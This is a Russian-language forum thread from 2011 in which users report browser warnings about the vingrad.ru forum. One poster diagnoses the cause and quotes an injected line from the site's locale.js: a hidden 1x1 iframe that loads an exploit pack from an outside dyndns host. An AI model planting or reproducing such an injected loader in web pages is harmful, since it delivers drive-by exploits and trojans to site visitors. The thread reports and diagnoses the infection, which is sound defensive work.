Поиск:

Ответ в темуСоздание новой темы Создание опроса
> IE8 говорит "Это известный небезопасный веб-узел", Рекомендуется завершить работу 
:(
    Опции темы
Embedded
  Дата 31.3.2011, 17:09 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 65
Регистрация: 22.2.2011
Где: Россия

Репутация: нет
Всего: 1



Здравствуйте.
IE сообщает о не безопасно содержание этого сайта и настоятельно рекомендует покинуть forum.vingrad.ru
Простите меня пожалуйста если об этом уже известно.

Это сообщение отредактировал(а) Embedded - 1.4.2011, 07:22

Присоединённый файл ( Кол-во скачиваний: 33 )
Присоединённый файл  dan.PNG 27,99 Kb
PM MAIL   Вверх
irinazanuda
Дата 31.3.2011, 18:56 (ссылка)    | (голосов:1) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Участник
Сообщений: 911
Регистрация: 23.6.2010

Репутация: нет
Всего: 18



Мне тоже так было. Возьми другой браузер , и всё будет ок (Лису4 или Хром), оказывается IE нужен только для перехода на эти браузера, и на всякий случай пусть будет на рабочем столе. (для скачивания некоторых программ). Не расстраивайся, поставь хороший антивирус, и смело можешь быть
PM MAIL   Вверх
Embedded
Дата 31.3.2011, 20:13 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 65
Регистрация: 22.2.2011
Где: Россия

Репутация: нет
Всего: 1



irinazanuda
Ирина, у меня стоят все ходовые браузеры, иногда пользуюсь IE если под рукой. Антивирусы не использую (использую очень, очень редко) Я как бы больше Администрации сайта хотел подсказать об этом.
Интересная у Вас аватарка) Спасибо за помощь и сочувствие)

Это сообщение отредактировал(а) Embedded - 31.3.2011, 20:25
PM MAIL   Вверх
Michael.de
Дата 31.3.2011, 20:15 (ссылка) |  (голосов:3) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Участник
Сообщений: 346
Регистрация: 22.3.2005
Где: Deutschland

Репутация: нет
Всего: 9



Embedded, аналогичная ситуация. Администрация, ау!! smile
irinazanuda - девушка, не давайте бессмысленных советов smile
PM MAIL   Вверх
Embedded
Дата 31.3.2011, 20:29 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 65
Регистрация: 22.2.2011
Где: Россия

Репутация: нет
Всего: 1



Michael.de, дружище, я уже думал что либо никто кроме меня не пробовал заходит с IE либо у меня галлюцинации) Рад что это не так)

Хотел еще добавить, что иногда сайт начинает циклично обновляться иногда загружается очень долго и с проблемами. Рекламные банеры не пашут почти все время "Соединение закрыто удалённым сервером" во всех браузерах. Так что Администраторы принимайте меры!

Это сообщение отредактировал(а) Embedded - 31.3.2011, 20:29
PM MAIL   Вверх
LuxInTenebris
  Дата 31.3.2011, 21:16 (ссылка) |    (голосов:4) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 16
Регистрация: 22.2.2009

Репутация: нет
Всего: нет



Движок форума заражён malware!

Открываем http://forum.vingrad.ru/lang/ru/locale.js (один из используемых движком форума JS скриптов, сам по себе безвреден). Видим первой строчкой:
Код
document.write(' <iframe src="http://hiuopertik.dyndns.org/j7yfdaq/ancnhpdveljn.php?n=dunner" width="1" height="1" frameborder="0"></iframe> ');var lang_js = new Array();

По ссылке грузится эксплойт-пак, подбирающий один или несколько релевантных эксплойтов под ваш браузер и прочий софт (Java VM, Flash Player плагин, Windows Media Player). Итогом успешного эксплуатирования уязвимости будет порция троянов на вашем компе. smile

Вот отчёт malware анализатора Wepawet: http://wepawet.iseclab.org/view.php?hash=6...797&type=js

Это сообщение отредактировал(а) LuxInTenebris - 31.3.2011, 21:20
PM MAIL   Вверх
zhz
Дата 6.4.2011, 12:08 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 76
Регистрация: 31.10.2006
Где: Petropavlovsk-Kam chatsky

Репутация: нет
Всего: 2



Яндекс шипит что "сайт может угражать безопасности вашего компьютера". Где администрация? Почему реакции нет? Начало темы 31.03 а сегодня уже 06.04!!!!
PM MAIL ICQ   Вверх
Akina
Дата 6.4.2011, 12:16 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Советчик
****


Профиль
Группа: Модератор
Сообщений: 20570
Регистрация: 8.4.2004
Где: Зеленоград

Репутация: нет
Всего: 453



Интересно, почему у меня IE молчит как партизан, и никакие эксплоиты и трояны не грузятся? я бы загрузил, посмотрел, поковырял...
Может, это из-за слишком правильно настроенной зоны безопасности?


--------------------
 О(б)суждение моих действий - в соответствующей теме, пожалуйста. Или в РМ. И высшая инстанция - Администрация форума.

PM MAIL WWW ICQ Jabber   Вверх
Freyzer
Дата 7.4.2011, 15:33 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


обаятельный нахал
**


Профиль
Группа: Участник
Сообщений: 277
Регистрация: 12.12.2009
Где: на Марсе

Репутация: нет
Всего: 1



Я ваще на Висте без сервис паков сижу и пользуюсь до сих пор ИЕ 7, глючная операционка, глючный ИЕ и ни каких проблем не ощущаю  smile Просто, руки прямые должны быть  smile  

Это сообщение отредактировал(а) Freyzer - 7.4.2011, 15:33


--------------------
Advocatus Dei smile. Advocatus Diaboli smileAjo!   
PM MAIL   Вверх
interinna
Дата 13.11.2011, 11:44 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 2
Регистрация: 13.11.2011
Где: Москва

Репутация: нет
Всего: нет



Цитата

Яндекс шипит что "сайт может угражать безопасности вашего компьютера". Где администрация? Почему реакции нет? Начало темы 31.03 а сегодня уже 06.04!!!! 

Яндекс так часто делает без причины
PM MAIL WWW   Вверх
500mhz
Дата 20.11.2011, 14:16 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


шайтан
***


Профиль
Группа: Завсегдатай
Сообщений: 1017
Регистрация: 5.5.2008
Где: Киев / Italy

Репутация: нет
Всего: 14



McAfee ругаеться на форум )))


--------------------

PM MAIL ICQ   Вверх
ProgMaster1
  Дата 28.11.2011, 08:34 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 1
Регистрация: 18.11.2011

Репутация: нет
Всего: нет



Наверное ктото выложил вирус на форуме, IE ТУПОЙ зайдите другим браузером.
PM MAIL   Вверх
  
Ответ в темуСоздание новой темы Создание опроса
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | Обсуждение форума | Следующая тема »


 




[ Время генерации скрипта: 0.1428 ]   [ Использовано запросов: 21 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.